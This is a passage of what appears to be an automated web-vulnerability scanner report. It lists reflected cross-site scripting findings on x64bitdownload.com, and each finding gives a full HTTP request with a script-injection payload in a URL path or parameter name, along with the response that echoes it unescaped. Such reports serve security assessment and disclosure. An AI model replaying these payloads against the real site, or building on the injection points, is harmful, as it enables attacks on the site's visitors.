4.1580. http://www.x64bitdownload.com/64-bit-ozum-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98bd1"><script>alert(1)</script>f6291253f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1" />
...[SNIP]...

4.1581. http://www.x64bitdownload.com/64-bit-par-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0759"><script>alert(1)</script>6fd3ce475e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7" />
...[SNIP]...

4.1582. http://www.x64bitdownload.com/64-bit-par-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c878"><script>alert(1)</script>7559f64c803 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1" />
...[SNIP]...

4.1583. http://www.x64bitdownload.com/64-bit-podcast-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7970"><script>alert(1)</script>88378e0e2f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5" />
...[SNIP]...

4.1584. http://www.x64bitdownload.com/64-bit-podcast-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4622"><script>alert(1)</script>bdc4521abda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1" />
...[SNIP]...

4.1585. http://www.x64bitdownload.com/64-bit-rar-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b2e"><script>alert(1)</script>6e0959531ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff" />
...[SNIP]...

4.1586. http://www.x64bitdownload.com/64-bit-rar-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e87e"><script>alert(1)</script>7391c84ac49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1" />
...[SNIP]...

4.1587. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf657"><script>alert(1)</script>ba7bde42ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:14 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab" />
...[SNIP]...

4.1588. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce3f"><script>alert(1)</script>fad1e3471a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1" />
...[SNIP]...

4.1589. http://www.x64bitdownload.com/64-bit-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc2d"><script>alert(1)</script>fcd3dfde6f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3" />
...[SNIP]...

4.1590. http://www.x64bitdownload.com/64-bit-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14914"><script>alert(1)</script>113a0fba4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1" />
...[SNIP]...

4.1591. http://www.x64bitdownload.com/64-bit-reading-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cf3"><script>alert(1)</script>15bec155853 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853" />
...[SNIP]...

4.1592. http://www.x64bitdownload.com/64-bit-reading-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f20"><script>alert(1)</script>c2ca189390f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1" />
...[SNIP]...

4.1593. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff5d"><script>alert(1)</script>01c8f498ee9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9" />
...[SNIP]...

4.1594. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a440d"><script>alert(1)</script>265b1c4833d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1" />
...[SNIP]...

4.1595. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
